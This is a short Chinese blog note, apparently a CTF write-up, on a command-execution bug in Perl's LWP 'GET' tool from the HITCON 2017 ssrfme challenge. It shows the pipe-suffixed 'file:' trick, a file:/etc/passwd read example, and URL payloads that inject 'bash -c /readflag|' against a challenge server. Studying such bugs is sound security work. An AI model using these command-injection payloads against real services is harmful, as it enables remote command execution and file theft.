GET的命令执行漏洞

源于hitcon中的题目ssrfme的wp,然后去搜了下这个漏洞,做个简单的记录吧。https://lorexxar.cn/2017/11/10/hitcon2017-writeup/#sql-so-hard

首先要先知道perl的open可以执行命令，如下：

而在GET命令中存在open函数

file.pm
84: opendir(D, $path) or
132:    open(F, $path) or return new

同时open函数还支持file协议

root@iZ285ei82c1Z:~/test# cat /usr/share/perl5/LWP.pm
...
=head2 File Request
The library supports GET and HEAD methods for file requests.  The
"If-Modified-Since" header is supported.  All other headers are
ignored.  The I<host> component of the file URL must be empty or set
to "localhost".  Any other I<host> value will be treated as an error.
Directories are always converted to an HTML document.  For normal
files, the "Content-Type" and "Content-Encoding" in the response are
guessed based on the file suffix.
Example:
  $req = HTTP::Request->new(GET => 'file:/etc/passwd');
...

但是很尴尬的是，接下来的复现失败了，只能copy@LoRexxar师傅的了。
我们可以测试一下

root@iZ285ei82c1Z:~/test# GET 'file:id|'
uid=0(root) gid=0(root) groups=0(root)

发现成功执行了命令，payload来自rr的博客

http://13.115.136.15/?url=file:bash%20-c%20/readflag|&filename=bash%20-c%20/readflag|
http://13.115.136.15/?url=file:bash%20-c%20/readflag|&filename=bash%20-c%20/readflag|
http://13.115.136.15/sandbox/c36eb1c4372f5f8131542751d486cebd/bash%20-c%20/readflag%7C

赏

×

纯属好玩

扫码打赏，你说多少就多少

打开支付宝扫一扫，即可进行扫码打赏哦